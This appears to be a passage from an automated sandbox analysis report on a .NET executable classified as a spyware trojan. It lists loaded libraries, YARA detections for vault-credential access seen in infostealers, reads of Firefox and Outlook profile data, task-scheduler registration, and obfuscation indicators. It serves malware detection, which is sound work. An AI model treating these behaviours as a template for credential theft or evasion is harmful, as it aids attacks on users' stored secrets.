                        Source: T_240369_S#U0130PAR#U0130S.exe, 00000000.00000002.1641702888.00000000048EF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs T_240369_S#U0130PAR#U0130S.exe
                        Source: T_240369_S#U0130PAR#U0130S.exe, 00000000.00000002.1641702888.0000000004967000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs T_240369_S#U0130PAR#U0130S.exe
                        Source: T_240369_S#U0130PAR#U0130S.exe, 00000000.00000002.1641702888.00000000049EB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamee5e91891-7867-4b86-a47d-bb7bc78fea84.exe4 vs T_240369_S#U0130PAR#U0130S.exe
                        Source: T_240369_S#U0130PAR#U0130S.exe, 00000000.00000002.1650391650.0000000005C80000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs T_240369_S#U0130PAR#U0130S.exe
                        Source: T_240369_S#U0130PAR#U0130S.exe, 00000000.00000002.1647338287.00000000055E0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenamePmfcahfwm.dll" vs T_240369_S#U0130PAR#U0130S.exe
                        Source: T_240369_S#U0130PAR#U0130S.exe, 00000000.00000002.1636489772.0000000002FE7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclrjit.dllT vs T_240369_S#U0130PAR#U0130S.exe
                        Source: T_240369_S#U0130PAR#U0130S.exe, 00000000.00000002.1636489772.0000000002FE7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs T_240369_S#U0130PAR#U0130S.exe
                        Source: T_240369_S#U0130PAR#U0130S.exe, 00000000.00000002.1636489772.0000000002FE7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $^q,\\StringFileInfo\\040904B0\\OriginalFilename vs T_240369_S#U0130PAR#U0130S.exe
                        Source: T_240369_S#U0130PAR#U0130S.exe, 00000000.00000002.1635476932.000000000121E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs T_240369_S#U0130PAR#U0130S.exe
                        Source: T_240369_S#U0130PAR#U0130S.exe, 00000000.00000002.1636489772.000000000315D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameprotobuf-net.dllJ vs T_240369_S#U0130PAR#U0130S.exe
                        Source: T_240369_S#U0130PAR#U0130S.exe, 00000000.00000002.1636489772.000000000315D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs T_240369_S#U0130PAR#U0130S.exe
                        Source: T_240369_S#U0130PAR#U0130S.exe, 00000000.00000002.1636489772.000000000315D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamee5e91891-7867-4b86-a47d-bb7bc78fea84.exe4 vs T_240369_S#U0130PAR#U0130S.exe
                        Source: T_240369_S#U0130PAR#U0130S.exe, 00000000.00000000.1626641074.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameOkfhzt.exe" vs T_240369_S#U0130PAR#U0130S.exe
                        Source: T_240369_S#U0130PAR#U0130S.exe, 00000001.00000002.4084734470.0000000000440000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: OriginalFilenamee5e91891-7867-4b86-a47d-bb7bc78fea84.exe4 vs T_240369_S#U0130PAR#U0130S.exe
                        Source: T_240369_S#U0130PAR#U0130S.exe, 00000001.00000002.4085009012.0000000000B69000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs T_240369_S#U0130PAR#U0130S.exe
                        Source: T_240369_S#U0130PAR#U0130S.exeBinary or memory string: OriginalFilenameOkfhzt.exe" vs T_240369_S#U0130PAR#U0130S.exe
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeSection loaded: version.dllJump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeSection loaded: version.dllJump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeSection loaded: wbemcomn.dllJump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeSection loaded: rasapi32.dllJump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeSection loaded: rasman.dllJump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeSection loaded: rtutils.dllJump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeSection loaded: mswsock.dllJump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeSection loaded: winhttp.dllJump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeSection loaded: iphlpapi.dllJump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeSection loaded: dhcpcsvc6.dllJump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeSection loaded: dhcpcsvc.dllJump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeSection loaded: dnsapi.dllJump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeSection loaded: winnsi.dllJump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeSection loaded: rasadhlp.dllJump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeSection loaded: fwpuclnt.dllJump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeSection loaded: vaultcli.dllJump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeSection loaded: secur32.dllJump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeSection loaded: schannel.dllJump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeSection loaded: mskeyprotect.dllJump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeSection loaded: ntasn1.dllJump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeSection loaded: ncrypt.dllJump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeSection loaded: ncryptsslp.dllJump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeSection loaded: gpapi.dllJump to behavior
                        Source: T_240369_S#U0130PAR#U0130S.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                        Source: 1.2.T_240369_S#U0130PAR#U0130S.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                        Source: 0.2.T_240369_S#U0130PAR#U0130S.exe.3308d20.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                        Source: 0.2.T_240369_S#U0130PAR#U0130S.exe.4a01830.3.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                        Source: 0.2.T_240369_S#U0130PAR#U0130S.exe.3308d20.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                        Source: 0.2.T_240369_S#U0130PAR#U0130S.exe.4a01830.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                        Source: 0.2.T_240369_S#U0130PAR#U0130S.exe.322e800.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                        Source: 0.2.T_240369_S#U0130PAR#U0130S.exe.31ee1f4.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                        Source: 0.2.T_240369_S#U0130PAR#U0130S.exe.5c80000.17.raw.unpack, ITaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask'
                        Source: 0.2.T_240369_S#U0130PAR#U0130S.exe.5c80000.17.raw.unpack, TaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'
                        Source: 0.2.T_240369_S#U0130PAR#U0130S.exe.5c80000.17.raw.unpack, Task.csTask registration methods: 'RegisterChanges', 'CreateTask'
                        Source: 0.2.T_240369_S#U0130PAR#U0130S.exe.5c80000.17.raw.unpack, TaskService.csTask registration methods: 'CreateFromToken'
                        Source: 0.2.T_240369_S#U0130PAR#U0130S.exe.5c80000.17.raw.unpack, TaskSecurity.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
                        Source: 0.2.T_240369_S#U0130PAR#U0130S.exe.5c80000.17.raw.unpack, TaskSecurity.csSecurity API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
                        Source: 0.2.T_240369_S#U0130PAR#U0130S.exe.5c80000.17.raw.unpack, TaskFolder.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                        Source: 0.2.T_240369_S#U0130PAR#U0130S.exe.5c80000.17.raw.unpack, Task.csSecurity API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                        Source: 0.2.T_240369_S#U0130PAR#U0130S.exe.5c80000.17.raw.unpack, User.csSecurity API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
                        Source: 0.2.T_240369_S#U0130PAR#U0130S.exe.5c80000.17.raw.unpack, TaskPrincipal.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                        Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/1@2/2
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\T_240369_S#U0130PAR#U0130S.exe.logJump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeMutant created: NULL
                        Source: T_240369_S#U0130PAR#U0130S.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                        Source: T_240369_S#U0130PAR#U0130S.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                        Source: T_240369_S#U0130PAR#U0130S.exeReversingLabs: Detection: 47%
                        Source: unknownProcess created: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe "C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe"
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeProcess created: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe "C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe"
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeProcess created: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe "C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe"Jump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\ProfilesJump to behavior
                        Source: T_240369_S#U0130PAR#U0130S.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                        Source: T_240369_S#U0130PAR#U0130S.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
                        Source: T_240369_S#U0130PAR#U0130S.exeStatic file information: File size 2987520 > 1048576
                        Source: T_240369_S#U0130PAR#U0130S.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x2d8c00
                        Source: T_240369_S#U0130PAR#U0130S.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                        Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: T_240369_S#U0130PAR#U0130S.exe, 00000000.00000002.1641702888.00000000048EF000.00000004.00000800.00020000.00000000.sdmp, T_240369_S#U0130PAR#U0130S.exe, 00000000.00000002.1641702888.0000000004967000.00000004.00000800.00020000.00000000.sdmp, T_240369_S#U0130PAR#U0130S.exe, 00000000.00000002.1650391650.0000000005C80000.00000004.08000000.00040000.00000000.sdmp, T_240369_S#U0130PAR#U0130S.exe, 00000000.00000002.1636489772.000000000315D000.00000004.00000800.00020000.00000000.sdmp
                        Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: T_240369_S#U0130PAR#U0130S.exe, 00000000.00000002.1641702888.00000000048EF000.00000004.00000800.00020000.00000000.sdmp, T_240369_S#U0130PAR#U0130S.exe, 00000000.00000002.1641702888.0000000004967000.00000004.00000800.00020000.00000000.sdmp, T_240369_S#U0130PAR#U0130S.exe, 00000000.00000002.1650391650.0000000005C80000.00000004.08000000.00040000.00000000.sdmp, T_240369_S#U0130PAR#U0130S.exe, 00000000.00000002.1636489772.000000000315D000.00000004.00000800.00020000.00000000.sdmp
                        Source: Binary string: protobuf-net.pdbSHA256}Lq source: T_240369_S#U0130PAR#U0130S.exe, 00000000.00000002.1641702888.000000000477F000.00000004.00000800.00020000.00000000.sdmp, T_240369_S#U0130PAR#U0130S.exe, 00000000.00000002.1641702888.000000000485F000.00000004.00000800.00020000.00000000.sdmp, T_240369_S#U0130PAR#U0130S.exe, 00000000.00000002.1649013598.0000000005AF0000.00000004.08000000.00040000.00000000.sdmp, T_240369_S#U0130PAR#U0130S.exe, 00000000.00000002.1636489772.000000000315D000.00000004.00000800.00020000.00000000.sdmp
                        Source: Binary string: protobuf-net.pdb source: T_240369_S#U0130PAR#U0130S.exe, 00000000.00000002.1641702888.000000000477F000.00000004.00000800.00020000.00000000.sdmp, T_240369_S#U0130PAR#U0130S.exe, 00000000.00000002.1641702888.000000000485F000.00000004.00000800.00020000.00000000.sdmp, T_240369_S#U0130PAR#U0130S.exe, 00000000.00000002.1649013598.0000000005AF0000.00000004.08000000.00040000.00000000.sdmp, T_240369_S#U0130PAR#U0130S.exe, 00000000.00000002.1636489772.000000000315D000.00000004.00000800.00020000.00000000.sdmp

                        Data Obfuscation

                        barindex
                        Source: 0.2.T_240369_S#U0130PAR#U0130S.exe.5c80000.17.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
                        Source: 0.2.T_240369_S#U0130PAR#U0130S.exe.5c80000.17.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
                        Source: 0.2.T_240369_S#U0130PAR#U0130S.exe.5c80000.17.raw.unpack, XmlSerializationHelper.cs.Net Code: ReadObjectProperties
                        Source: Yara matchFile source: 0.2.T_240369_S#U0130PAR#U0130S.exe.468f600.12.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.T_240369_S#U0130PAR#U0130S.exe.46675e0.13.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.T_240369_S#U0130PAR#U0130S.exe.31ee1f4.2.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.T_240369_S#U0130PAR#U0130S.exe.468f600.12.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.T_240369_S#U0130PAR#U0130S.exe.5c10000.16.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.T_240369_S#U0130PAR#U0130S.exe.477f640.9.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.T_240369_S#U0130PAR#U0130S.exe.46675e0.13.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.T_240369_S#U0130PAR#U0130S.exe.31ee1f4.2.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.T_240369_S#U0130PAR#U0130S.exe.41af790.10.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000000.00000002.1650117594.0000000005C10000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.1641702888.000000000477F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.1636489772.000000000315D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.1641702888.0000000003F81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: T_240369_S#U0130PAR#U0130S.exe PID: 7304, type: MEMORYSTR
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeCode function: 0_2_02F60F5D push edi; retf 0_2_02F60F60
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeCode function: 0_2_02F64C70 push eax; ret 0_2_02F64C71
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeCode function: 0_2_05ADF4E4 push es; iretd 0_2_05ADF4E7
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeCode function: 0_2_05B4A870 push ebx; ret 0_2_05B4A877
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeCode function: 0_2_05B42390 pushad ; iretd 0_2_05B42391
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeCode function: 0_2_05E6842A pushad ; iretd 0_2_05E6842B
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeCode function: 0_2_05E67E76 push ss; iretw 0_2_05E67E77
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeCode function: 1_2_01140CA1 push edi; retf 1_2_01140CAA
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeCode function: 1_2_066642D7 push ebx; ret 1_2_066642DA
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
